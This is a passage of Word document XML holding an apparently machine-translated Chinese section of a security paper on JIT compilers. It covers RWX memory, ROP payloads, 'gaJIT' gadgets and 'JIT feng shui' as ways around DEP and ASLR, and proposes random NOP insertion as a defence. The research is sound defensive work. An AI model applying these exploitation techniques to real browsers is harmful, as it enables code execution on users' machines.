        <w:t>，内联高速缓存（IC）既需要写权限也需要执行权限，以保持其设计时的性能优势。如本文前面所述，Nitro汇编程序使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ExecutablePool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类分配</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>必要的内存来保存发出的代码。然后将这些较大的分配划分为持有本机代码的各个块。每次更新缓存时，通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mprotect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（2）或</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VirtualProtect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行的旅行将花费宝贵的CPU周期。我们认为正是由于这个原因，利用内联高速</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>缓存的引擎将无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">法在短期内解决而没有可衡量的性能损失。 Nitro / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>aegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>消息来源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的以下评论证实了我们的怀疑：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0ECA35" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18703F14" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="542"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/ *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设置此标志可防止汇编程序使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>RWX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内存；这可能会提高安全性，但</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目前会</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>带来巨大的性能成本。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>* /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530A46E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>#if WTF_PLATFORM_IPHONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5620D259" w14:textId="0F619A08" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>＃</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>define</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ENABLE_ASSEMBLER_WX_EXCLUSIVE 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443277A0" w14:textId="4CCA2C19" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="19"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>＃</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>lse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24000D" w14:textId="29B36439" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="19"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>＃</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">efine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ENABLE_ASSEMBLER_WX_EXCLUSIVE 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0322E524" w14:textId="061C6FCD" w:rsidR="0026102A" w:rsidRPr="00A5797A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="39"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>＃</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ndif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD5790" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D52614" w14:textId="1F8F5C67" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="143" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>对于ROP（面向返回编程）</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ayload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>，通常使用</w:t>
      </w:r>
      <w:r>
        <w:t>现有</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>比如：</w:t>
      </w:r>
      <w:r>
        <w:t>VirtualAlloc，VirtualProtect，WriteProcessMemory或其他API（可用于将较大的Sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ellcode有效负载分</w:t>
      </w:r>
      <w:r>
        <w:t>配给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>可写和可执行内存）使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2293ED" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B91A997" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>将被复制到。如果找不到合适的导入，则可以合理地预期攻击者可以通过JIT Spray偶然登陆或泄漏JIT页面的地址来重用现有的RWX页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E23CC10" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E586337" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_bookmark11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ROP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gaJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和JIT风水</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE33A47" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B3F9507" w14:textId="467C4636" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="425"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>面向返回的编程（ROP）是一种发明的技术，可逃避DEP / WX [10] [11]提供的保护。 ROP的概念涉及通过应用程序.text或已加载的库模块将过程中存在的现有可执行代码中的代码序列链接在一​​起。这些意外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的代码序列通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>常被称为</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gadgets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，因为每个</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gadgets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>都执行一个小任务，但是可以组合起来以创建工作状态机。最常见的ROP有效负载将小工具链接在一起，这些小工具将堆栈指针更改为攻击者控制的有效负载，分配RWX内存，将更大的Shellcode有效负载复制到其中并执行它。正如我们在上一页权限一节中指出的那样，由于JIT引擎经常通过喷雾或非随机分配API在可预测的位置引入许多RWX页面，因此其中某些步骤可能不再必要。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31450237" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F72B532" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>除了RWX覆盖的可能性外，我们还介绍了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gaJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的概念，我们将其定义为在多个JIT生成的代码页上以静态或可预测的偏移</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>量找到</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的意外代码序列。这种技术的吸引力很明显。尽管加载的库模块可能包含更多，更容易找到的ROP小工具，但它们的位置始终是随机的，并且只能由目标进程加载一次。 JIT页面分配及其可预测的代码序列可以被多次分配，并且受不受信任的输入的直接</w:t>
      </w:r>
      <w:commentRangeStart w:id="13"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>影响</w:t>
      </w:r>
      <w:commentRangeEnd w:id="13"/>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
        <w:commentReference w:id="13"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9E285D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047F5287" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">克里斯·罗尔夫（Chris </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Rohlf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）（本文的合著者）先前已经研究了在多个JIT页面上使用重复的代码块将ROP（返回定向编程）小工具组合在一起的概念[12]。</w:t>
      </w:r>
      <w:r>
        <w:t>当时，这项研究中审查的唯一JIT引擎是Firefox的TraceMonkey。我们将该研究扩展到JaegerMonkey和LLVM，并为本文稍后介绍的抖动工具链开发了gaJIT查找Ruby类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238DB73F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EBBBA31" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="501"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为了在发出的代码中正确生成并找到可用的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gaJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">，我们需要一种更好地影响JIT引擎生成它们的方法。为了解决这个问题，我们介绍了JIT风水。 JIT风水的概念源自Alex </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Sotirov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的堆风水技术[15]。堆风水被开发用于内存破坏漏洞利用，其中需要以某种模式修饰底层</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>堆结构</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以提高漏洞利用的可靠性。我们借用的技术名称与预期目的非常相似。使用特定的高级语言模式，我们可以强制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E29628" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A76AC0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>JIT引擎生成包含特定代码序列的可预测代码块。这些代码序列通常包含可预测的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gaJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。在这方面，每个JIT引擎都是不同的，尽管通用技术适用于所有不会随机化其生成代码的JIT引擎，但实现方式会有很大不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B72903" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAD02BA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="427"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ROP技术通常通过ASLR（地址空间布局随机化）来缓解，这会降低</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>特定小</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具位于已知位置的可能性。尽管仍然可以将随机化应用于诸如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之类的JIT内存分配例程，但事实是，与不受信任的源（JavaScript或字节码表示形式）相比，仍可以迫使引擎在整个内存中分配本机代码的许多副本。这样可以有效减轻ASLR提供的保护。因此，必须在每个JIT生成的页面上实施随机NOP插入，以防止这种攻击。我们将在本文的“ JIT强化”部分介绍这种缓解技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E5A9B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F6DFA0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
